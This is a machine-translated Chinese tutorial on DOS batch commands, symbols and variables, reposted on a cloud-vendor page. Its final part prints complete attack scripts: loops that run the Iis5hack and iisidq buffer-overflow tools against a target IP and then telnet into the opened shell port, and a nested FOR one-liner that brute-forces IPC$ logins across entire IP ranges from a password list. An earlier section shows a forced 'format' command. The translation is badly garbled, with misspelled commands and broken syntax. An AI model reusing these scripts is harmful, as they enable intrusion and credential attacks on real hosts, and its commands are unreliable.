Some dos/bat batch tutorials have been sorted _dos/bat

Source: Internet
Author: User
Tags echo command echo message eol goto
The tutorial is divided into 4 parts, the first part is a batch of special commands, the second part is a special symbol and batch processing, the third part is batch and variable, part four is a complete case. Because the tutorial is relatively long, all in the magazine we will be divided into two series, this issue first published one or two parts, please readers attention.





Part I: Special commands for batch processing





A batch file is a series of commands that are set up in a certain order as an executable text file with the extension bat. These commands are collectively referred to as batch commands, and I would like to introduce you to the order of the batch process.


1. REM


REM is an annotation command is generally used to annotate the program, the content of the command will not be displayed and executed when the program is executed. Cases:


REM What you see now is the annotation, and this sentence will not be executed. What is explained in a later example is that REM is placed behind Rem. Attention, please.





2, ECHO


Echo is a echo command the main parameters are off and on, and the echo message is typically used to display a specific information. Cases:


Echo off


Rem above represents turn off echo without displaying the commands that are executed


Echo is the message.


Rem above represents the column character "This is the message"


Execution results:


C:\>echo. BAT


This is the news.





3, GOTO


Goto is the meaning of jump. Allow ": XXX" to construct a label in batch processing and then use goto: Label directly to perform the order after marking. Cases


: LABEL


REM is the label named label.


DIR C:\


DIR D:\


GOTO LABEL


REM above the program Jump label label to continue execution.





4, call


The call command can invoke another batch during batch execution, and then continue with the original batch when another batch finishes executing. Cases:


Batch processing 2. The bat contents are as follows:


ECHO, this is the 2 content.


Batch processing 1. The bat contents are as follows:


ECHO, this is 1 content.


Call 2.BAT


The contents of ECHO 1 and 2 are all displayed complete


The results of the implementation are as follows:


C:\>1.bat


This is 1 content.


That's 2 of the stuff.


The contents of 1 and 2 show complete





5, PAUSE


PAUSE stops the execution of system commands and displays the following content. Cases:


C:\> PAUSE


Please press any key to continue ...





6, IF


IF condition to judge the statement, the syntax format is as follows:


IF [NOT] ERRORLEVEL number command


IF [NOT] string1==string2 command


IF [NOT] EXIST filename command


Description


[NOT] Returns the returned result as the "if not" meaning.


ERRORLEVEL is the exit value returned after the command execution completes


The number exit value range 0~255. The order of the values should be large and small. If the value returned is greater than or equal to the specified value, the condition is set.


String1==string2 string1 and string2 are both character data, the uppercase and lowercase characters will be treated differently, and the equals number in this condition must be 2 (absolutely equal), and the condition should be followed by the command


EXIST filename is the meaning of the existence of a file or directory.


IF ERRORLEVEL This statement must be placed behind a command. The return value of the command is judged by the if errorlevel after the command is executed.


Cases:


1. IF [NOT] ERRORLEVEL number command


Determine the return value after the test command has been executed.


echo off


Dir z:


REM If the exit code is 1 (unsuccessful) jump to Heading 1 for execution


IF errorlevel 1 goto 1


REM If exit code is 0 (successful) jump to heading 0 to execute


IF errorlevel 0 goto 0


: 0


echo Command executed successfully!


Rem program execution jump to title exit exit


Goto exit


: 1


echo command failed to execute!


Rem program execution jump to title exit exit


Goto exit


: Exit


Rem here is the exit of the program


2. IF string1==string2 Command


Check the value of the current variable to make a judgment


ECHO off


IF%1==2 Goto No


Echo variable Equal!


Goto exit


: No


echo variables are not equal


Goto exit


: Exit


So you can see the effect c:\>test.bat number





3, IF [NOT] EXIST filename command


Find specific files to make judgments


echo off


IF not EXIST Autoexec.bat Goto 1


echo File exists successfully!


Goto exit


: 1


echo file does not exist failure!


Goto exit


: Exit


This batch can be placed in C and D respectively to perform a look at the effect.


7, for


For this command is special is a command to loop through the command, and for the loop inside can also apply for in the loop. In this article we introduce the basic usage of the cycle of no use, and then to explain the applied loop. The order for in the batch is as follows:


For [%%c] in (set) do [command] [arguments]


At the command line, the commands are as follows:


For [%c] in (set) do [command] [arguments]


Common parameters:


/L The set represents a sequence of numbers in increments from start to finish. Therefore, (1,1,5) will produce a sequence of 1 2 3 4 5, (5,-1,1) will produce a sequence (5 4 3 2 1).


/d If the set contains wildcard characters, specifies that the directory name is matched instead of the filename.





/F reads the data from the specified file as a variable


Eol=c-refers to the end of a line comment character (just one)


Skip=n-refers to the number of rows ignored at the start of the file.


Delims=xxx-refers to the delimiter set. This replaces the default delimiter set for spaces and tabs.


Tokens=x,y,m-n-refers to which symbol of each line is passed to the for itself for each iteration. This results in an assignment of the extra variable names. The m-n format is a range. Specify MTH by nth symbol. If the last character in the symbol string is asterisk, the extra variable is allocated and accepts the reserved text of the line after the last symbol resolution.


USEBACKQ-Specifies that the new syntax is used in the following cases: A string that executes a post quote as a command and a single quote character as a literal string command and allows the file name to be extended in filenameset with double quotes.


Here's an example:


For/f "eol=; tokens=2,3* delims=, "%i in (myfile.txt) do @echo%i%j


Each row in the myfile.txt is parsed, the rows preceded by semicolons are ignored, and the second and third symbols in each row are passed to the for program body, with commas and/or space delimited symbols. Notice that this for-body statement refers to%i to get the second symbol, referencing the%j to get the third symbol, and referencing%k to get all the remaining symbols after the third symbol. For file names with spaces, you need to enclose the file name in double quotes. In order to use double quotes in this way, you also need to use the USEBACKQ option, otherwise the double quotes are interpreted as being used to define a string to parse.


%i is specifically described in the For statement,%j and%k are specifically described through the tokens= option. You can specify up to 26 symbols by tokens= line, as long as you do not attempt to describe a variable above the letter ' z ' or ' z '. Keep in mind that the for variable is case-only and is generic, and that no more than 52 are in use at the same time.


You can also use for/f parsing logic on adjacent strings, by enclosing the filenameset between parentheses in single quotes. In this way, the string is treated as a single input line in a file. Finally, you can use the for/f command to parse the output of the command. The method is to turn the filenameset between parentheses into a backslash string. The string is treated as a command line and passed to a child CMD. EXE, its output is captured in memory and used as a file analysis. Therefore, the following example:


for/f "Usebackq delims=="%i in (' Set ') do @echo%i


The name of the environment variable in the current environment is enumerated.


The following is a simple example that will illustrate the difference between the parameter/L and the absence of parameters:


Delete file 1. TXT 2.TXT 3.TXT 4.TXT 5.TXT


Cases:


ECHO off


FOR/L%%f in (1,1,5) Todo DEL%%f.txt


Or


For%%f in (1,2,3,4,5) Todo DEL%%f.txt


The results of the above 2 commands are the same as follows:


C:\>del 1.TXT


C:\>del 2.TXT


C:\>del 3.TXT


C:\>del 4.TXT


C:\>del 5.TXT





8, SETLOCAL


Start localized operations for environment changes in batch files. After the execution of SETLOCAL


The environmental changes made are limited to batch files. To restore the original settings, you must


Line endlocal. When the end of the batch file is reached, the batch file is terminated with each


The SETLOCAL command that has not yet been executed will have an implied endlocal to be


Perform. Cases:


@ECHO off


SET Path/* View environment variable PATH


PAUSE


SETLOCAL


Set path=e:\tools/* Reset environment variable PATH


SET PATH


PAUSE


Endlocal


SET PATH


From the example above we can see that the environment variable path 1th time is displayed as the system default path. is set to E:\TOOLS and displayed as E:\TOOLS but after endlocal we can see that he was restored to the system's default path. But this setting works only when the batch is running. The environment variable path is restored when the batch process completes.





9, SHIFT


The SHIFT command allows the commands on the command to use more than 10 replaceable parameters (%0~%9) above:


ECHO off


ECHO%1%2%3%5%6%7%8%9


SHIFT


ECHO%1%2%3%5%6%7%8%9


SHIFT


ECHO%1%2%3%5%6%7%8%9


The results of the implementation are as follows:


C::\>shift. BAT 1 2 3 4 5 6 7 8 9 10 11


1 2 3 4 5 6 7 8 9


2 3 4 5 6 7 8 9 10


3 4 5 6 7 8 9 10 11


The above is based on WIN2000 9 batch processing commands.





Part II: Special symbols and batch processing





Some symbols are not allowed at the command line, but some have special meanings.


1, symbol (@)


@ is meant to turn off the echo of the current line in batch processing. We know from the above that the command echo off can turn off the entire batch of commands to echo but not to display the echo off command. Now we're going to add the @ so echo off command before this command is turned back on @ so that all the commands don't come back.


2, symbol (>)


> means to pass and overwrite. His role is to pass the Run-time echo results to the following range (the file is also the default system console) for example:


The contents of file 1.txt are:


1+1


Use the command c:\>dir *.txt >1.txt


The contents of 1.txt are as follows


The volume in drive C does not have a label.


The serial number of the volume is 301a-1508


C:\ The directory


2003-03-11 14:04 1,005 Frunlog. Txt


2003-04-04 16:38 18,598,494 Log.txt


2003-04-04 17:02 5 1.txt


2003-03-12 11:43 0 Aierrorlog.txt


2003-03-30 00:35 30,571 202.108.txt


5 Files 18,630,070 bytes


0 Directory 1,191,542,784 Free bytes


> overwrites the results of the command execution to the original file contents.


The program will not have any echoes when passed to the console (note: This echo is not the same concept as echo off.) echo off is the echo of the input command, where the Echo is an example of the echo in the program's execution:


C:\>dir *.txt >nul


The program will not have any display and will not produce any traces.


3, symbol (>>)


The role of symbol >> is similar to symbol >, but their difference is that >> is passed and appended to the end of the file >> can also be passed back to the console (usage ibid.) Example:


The same as in file 1.txt:


1+1


Use the command c:\>dir *.txt >>1.txt


The contents of 1.txt are as follows


1+1


The volume in drive C does not have a label.


The serial number of the volume is 301a-1508


C:\ The directory


2003-03-11 14:04 1,005 Frunlog. Txt


2003-04-04 16:38 18,598,494 Log.txt


2003-04-04 17:02 5 1.txt


2003-03-12 11:43 0 Aierrorlog.txt


2003-03-30 00:35 30,571 202.108.txt


5 Files 18,630,070 bytes


0 Directory 1,191,542,784 Free bytes


>> the results of the command execution are appended to the original file contents.


4, Symbol (|)


| is a pipe transfer command means to pass the result of the previous command to the next command to process. Cases:


C:\>dir C:\|find "1508"


The serial number of the volume is 301a-1508


The above command means to find all the C:\ and find 1508 strings. Find's usage Please check it by yourself


This is how I automatically format a platter without using format's automatic formatting parameters.


Echo Y|fornat A:/s/q/v:system


Anyone who has used the format command knows that the format has an interactive process in which the user enters Y to determine whether the current command is being executed. Add echo y to the command and use the pipe transfer character | To pass the echo's result y to format for the purpose of manually entering Y (this command is dangerous, be careful when testing)


5. Symbol (^)


^ is a leading character for special symbols >, <, &. In the order he removed the special kinetic energy of the above 3 symbols only as a sign instead of using their special meaning. Cases:


C:\>echo Test ^> 1.txt


Test > 1.txt


As you can see from the above, the test is not written to the file 1.txt but the test >1.txt is displayed as a string. This symbol works well when you build batches remotely.


6, Symbol (&)


The & symbol allows you to use more than 2 different commands on a single line, and the execution of the 2nd command will not be affected when the first command fails. Cases:


c:\> dir z:\ &dir y:\ &dir c:\


The above command will continuously show Z:y: C: The contents of the disk ignore the existence of the letter.


7, symbol (&&)


The && symbol also allows you to use more than 2 different commands on a single line, and subsequent commands will no longer be executed when the first command fails. Cases:


c:\> dir z:\ &&dir y:\ &&dir c:\


The above commands will prompt you to check for the existence of Z: Disk if present, execute, and stop all subsequent commands if they do not exist


8. Symbol ("")


The symbol allows spaces to be included in the string. To enter a special directory you can use the following method Example:


C:\>CD "Program Files"


C:\>CD progra~1


C:\>CD pro*


All of the above methods can be entered into the Program Files directory


9, symbol (,)


, the symbol is equivalent to a space. It can be used in some special cases instead of spaces. Cases:


C:\>dir,c:\


10. Symbol (;)


; symbols can be used for different purposes when the command is the same; isolated but performed unchanged. If an error occurs during execution, only the error report is returned but the program continues to execute. Cases:


DIR c:\;D: \; E:\f:\


The above command is equivalent to


DIR C:\


DIR D:\


DIR e:\


DIR f:\


Of course there are some special symbols, but their use of the area is very small no longer here to explain.





Part III: Batch processing and variables





The appropriate reference variables in the batch process will make your program more widely applied. A total of 10 variables can be processed per batch from%0~%9. Where%0 is used by default to the file name of the batch. %0 cannot be replaced by% 1 unless you use the shift command. Example of a reference to the shift command if you add a%0 to the front of%1, the result is as follows:


C::\>shift. BAT 1 2 3 4 5 6 7 8 9 10 11


SHIFT. BAT 1 2 3 4 5 6 7 8 9


1 2 3 4 5 6 7 8 9 10


2 3 4 5 6 7 8 9 10 11


How the system distinguishes each variable, the system distinguishes between the rules of the variable and the space in the middle of the string, that is, whenever a space is found, the character preceding the space is treated as a variable and the character following the space is used as another variable. If your variable is a long directory name with a space in it you need to circle it with the quotes in the last section of special symbol 8. Cases:


The batch content is:


ECHO%1


ECHO%2


ECHO%3


Enter command:


C:\>test "Program Files" program Files


Program Files


Program


Files


More than 10 variables that may be used concurrently in a complex batch will be conflicting with the system's rules. So how is this problem solved? There is also a variable in the system called an environment variable (using the SET command to view the current system's environment variables) such as the current system directory is%windir% or%systemroot%. When more than 10 parameters are used at the same time, we can save some variables that are called in later programs as environment variables. Specific usage such as SET a=%1 so we named a new environment variable A in the call to variable A to%a% this call, the environment variable is not affected by the shift command. If you want to change an environment variable, you need to reset it to change it. Of course, you can also transfer between variables and variables to achieve the goal. Let's take a look at an example of the batch processing as follows:


ECHO off


SET pass=%1


SHIFT


SET pass1=%1


SHIFT


ECHO%pass%%pass1%%1%2%3%5%6%7%8%9


SHIFT


ECHO%pass%%pass1%%9


The transfer of SET pass=%pass1% variable


SET pass1=%9


SHIFT


ECHO%pass%%pass1%%9


Using commands: C:\>test A B 3 4 5 6 7 8 9 K L


A B 3 4 5 6 7 8 9 K Note: This line shows 11 variables


A B l after using 3 shift,%9 becomes L.


The result of the transfer of the B L variable








Part IV: Complete case





These are some of the uses of batch processing. Now we combine these usages to analyze some of the batches currently posted online to see how they work. Here I will enumerate three examples for detailed analysis, in order to keep the program complete my comments will be appended to/*.


Example One


This example is a batch that uses Iis5hack.exe to overflow a host with a. Printer vulnerability. The use of the program has Iis5hack.exe and the system with the Telnet.exe. The iis5hack command format is:


Iis5hack < target ip> < target port > < target version > < overflow connection port > target version 0-9 these 10 numbers correspond to the different language versions and the SP's system versions respectively, and the batch process that we compile uses the format of the command <iis.bat Target IP (start version number) > start version number is optional. The procedure is as follows.


@echo off/* Turn off command echo


If "%1%" = "goto help/*" Determine if%1 is null,%1 is the destination IP


If "%2%" = = "1" Goto 1/* Determine if%2 is 1, 1 is a jump flag 1


If "%2%" = = "2" Goto 2/*%2 is the start version number, if not set then


If "%2%" = = "3" GOTO 3/* If present, start execution from match


If "%2%" = = "4" Goto 4


If "%2%" = = "5" Goto 5


If "%2%" = = "6" Goto 6


If "%2%" = = "7" Goto 7


If "%2%" = = "8" Goto 8


If not EXIST iis5hack.exe goto File/* No iis5hack.exe is found to execute the contents of the Flag file section


Ping%1-n 1 | Find "Received = 1"/*ping target 1 times, from the results found Received = 1


if errorlevel 1 goto error/* If the return code is 1 then the error segment is executed (code 1 is not found 0 is found and executed successfully)


Iis5hack%1 80 9 88 | Find "good"/* start overflow target port 80 system code 9 overflow after connection port 88 found the string "good" in execution results (only string good if overflow succeeds)


If not errorlevel 1 goto telnet/* If no error code 1 (overflow succeeds) executes the contents of the Telnet segment.


echo OS type 9 failed! /Otherwise show this sentence


: 8/* The following code content referenced above


Iis5hack%1 80 8 88 | Find "Good"


If not errorlevel 1 goto telnet


echo OS type 8 failed!


: 7


Iis5hack%1 80 7 88 | Find "Good"


If not errorlevel 1 goto telnet


echo OS type 7 failed!


: 6


Iis5hack%1 80 6 88 | Find "Good"


If not errorlevel 1 goto telnet


echo OS type 6 failed!


: 5


Iis5hack%1 80 5 88 | Find "Good"


If not errorlevel 1 goto telnet


echo OS type 5 failed!


: 4


Iis5hack%1 80 4 88 | Find "Good"


If not errorlevel 1 goto telnet


echo OS Type 4 failed!


: 3


Iis5hack%1 80 3 88 | Find "Good"


If not errorlevel 1 goto telnet


echo OS Type 3 failed!


: 2


Iis5hack%1 80 2 88 | Find "Good"


If not errorlevel 1 goto telnet


echo OS type 2 failed!


: 1


Iis5hack%1 80 1 88 | Find "Good"


If not errorlevel 1 goto telnet


echo OS Type 1 failed!


: 0


Iis5hack%1 80 0 88 | Find "Good"


If not errorlevel 1 goto telnet


echo OS type 0 failed!


Goto Error


: Telnet


Telnet%1 88/* 88 port to start connecting to destination IP


Goto Exit/* Link interrupted after jump exit segment


: The error/*error section displays help information after errors


Echo may not be able to connect to the network or the other side to fix the vulnerability! Please try the manual once in the following format!


echo iis5hack [Destination IP] [Web port] [System Type] [open port]


ECHO Chinese: 0


ECHO Chinese +sp1:1


ECHO English: 2


ECHO English +sp1:3


ECHO Japanese: 4


ECHO Japanese +sp1:5


ECHO Korean: 6


ECHO Korean +sp1:7


ECHO Mexican: 8


ECHO Mexican Language +sp1:9


Goto Exit/* Jump exit Segment


: File/*file section shows information not found in files


echo file Iis5hack.exe not found! Program Abort Run!


Goto Exit/* Jump exit Segment


: The Help/*help section shows the use format for this batch


echo This procedure uses the following:


echo IIS [Destination IP]


echo IIS [Destination IP] [start number 9-0]


: Exit/*exit Program exit


This batch basically does not have any loops just to walk down the road. So the code is relatively long difficult!


Case II


This example is a batch of overflow for a machine with a IDQ vulnerability using Iisidq.exe. The program used has the Iisidq.exe and the system to bring the program Telnet.exe. The use of Iisidq.exe is as follows:


Run Parameters: Operating system Type Destination address Web port 1 Overflow listening Port < input command 1>


In which, if the input command parameter is not entered, then the default is: "cmd.exe".


The code range for the operating system type type is 0-14. Our batch process uses the command format for the <idq.bat target ip> program as follows:


@echo off//* Same Example one


If not EXIST iisidq.exe goto file/* Same Example one


If%1 = = "" Goto error/* Same example one


Ping%1-n 1 | Find "Received = 1"/* Same Example one


if errorlevel 1 goto error1/* Same Example one


Set b=%1/* Creates an environment variable B that passes the contents of the variable%1 to environment variable B. The content of variable B will be the target IP later


Set a=0/* Creates an environment variable A and specifies that environment variable a is 0. A counter is used for a loop that uses the entire batch process.


: No/*no section begins


If%a%==0 set d=0/* If environment variable A=0 creates environment variable D to set environment variable d=0.


If%a%==1 set d=1/* environment variable D is actually the operating system type code, using counters to control its


If%a%==2 set d=2/* change.


If%a%==3 set d=3


If%a%==4 set d=4


If%a%==5 set d=5


If%a%==6 set d=6


If%a%==7 set d=7


If%a%==9 set d=9


If%a%==10 set d=13


If%a%==11 set d=14


Goto 0/* Variable transfer completed, go to flag 0 run


: 1


Echo is performing the%d%! Cannot connect to target%b%! Trying to connect please wait ...


: 0/* Flag 0 start


IISIDQ%d%%b% 1 |find "good"/* Send overflow command in format and find string good in result (sending code succeeds to have string good)


if errorlevel 1 goto 1/* If no good string is not sent to jump


/* Turn flag 1 continue to try to send


Ping 127.0.0.1-n 8 >nul/*ping itself 8 times the equivalent delay 8 seconds does not show hold


/* Line Result


Echo is performing the%d%! /* Reporting operating system types that are overflowing


Telnet%b% 99/* Connection Overflow port


Echo. /* Displays a blank line


If%d%==14 goto error1/* If the operating system type is 14 then jump Error1 (Recycle exit)


If%d%==13 set a=11/* Start attaching a counter to the operating system code again


If%d%==9 set a=10


If%d%==7 set a=9


If%d%==6 set a=7


If%d%==5 set a=6


If%d%==4 set a=5


If%d%==3 set a=4


If%d%==2 set a=3


If%d%==1 set a=2


If%d%==0 set a=1


Goto No/* Attached value complete jump no paragraph execution


: File//Below are the Help tips after an error


Echo IIsidq.exe didn't find it! Put the file in the same directory as this file!


Goto exit


: Error


echo Error! Destination IP not recognized! Please use the following format to connect!


echo idq [Destination IP]


Goto exit


: Error1


The echo connection did not succeed! Perhaps the target machine has patched up the vulnerability or network failure!


echo Please try it manually in the following format!


echo IISIDQ [Target type] [destination IP] [target port] [connection mode] [overflow port]


echo telnet [Destination IP] [overflow port]


: Exit/* Export of the entire program


This batch process is mastered by the overall cycle of the batching unit, mastering the Counter section.


Example Three


FOR/L%%a in (0,1,255) does for/l%%b in (0,1,255) does for/l%%c in (1,1,254) do for/f ' tokens=1,2* '%%e in (userpass.txt ) do net use \\%1.%%a.%%b.%%c\ipc$%%e/u:%%f


The above command is 1 commands. You can see that the command uses 4 for to apply. The usage is: c:\>test. BAT 218 When you enter 218 back, the command will be the 1th for the initial value of 0 for%%a then continue to take the 2nd for the initial value of 0 for%%b continue to take the 3rd for the initial value of 1 for the%%c the last for is the first paragraph in the userpass.txt as a password% E The second segment of the character as the username%%f the last command (here I bring the values above, set the password to 123 user name is ABC)


NET usr \\218.0.0.1\ipc$ 123/u:abc


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.